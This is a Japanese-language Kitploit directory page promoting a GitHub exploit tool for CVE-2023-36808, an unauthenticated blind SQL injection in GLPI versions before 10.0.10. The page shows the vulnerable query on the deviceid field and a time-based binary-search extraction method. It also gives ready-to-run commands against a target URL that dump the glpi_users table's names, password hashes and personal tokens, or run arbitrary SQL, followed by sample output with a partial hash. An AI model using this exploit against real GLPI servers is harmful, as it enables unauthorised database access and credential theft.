Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
exploit-cve-2023-36808 — GLPI cve-2023-36808 | Kitploit
ツール/GitHubGitHub/fransosiche/exploit-cve-2023-36808
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubfransosiche/exploit-cve-2023-36808

exploit-cve-2023-36808

GLPI cve-2023-36808

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-36808 - GLPI 未認証SQLインジェクション

脆弱性

GLPIバージョン < 10.0.10 は、/front/inventory.php に未認証のXMLインベントリエンドポイントを公開しています。
<deviceid> フィールドはサニタイズなしでSQLクエリに直接注入されます:

root@kitploit:~
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'

認証は不要です。この脆弱性により、ブラインドSQLインジェクションを介してデータベース全体の読み取りアクセスが可能になります。

エクスプロイト

このスクリプトは、二進探索を用いた時間ベースのブラインドインジェクション を使用して、一般的なツールよりも大幅に高速にデータを抽出します。

  • ブールチェックごとに1回のSLEEP(テーブルサイズに関係なく信頼性が高い)
  • 二進探索:文字あたり約7リクエスト(95ではなく)
  • フィールドレベルの並列処理:ユーザーごとに名前、パスワード、トークンを同時に抽出
  • 並行リクエスト間のタイミング干渉を防ぐ並行性上限

要件

root@kitploit:~
pip install -r requirements.txt

使用方法

root@kitploit:~
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http://<TARGET>/glpi

# Custom SQL query
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"

# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3

# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http://<TARGET>/glpi --parallel 4

出力例

root@kitploit:~
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep  : 0.5s  Threshold: 0.35s  Parallel: 2

[+] Target reachable
[+] Injection confirmed

[*] User 1/7
  name               glpi
  password           $2y$10$xN.12pQxSLlQdMJzP26EWe...
  personal_token     xxxx
...

参照

  • NVD - CVE-2023-36808
  • GLPI セキュリティアドバイザリ
ツールをダウンロード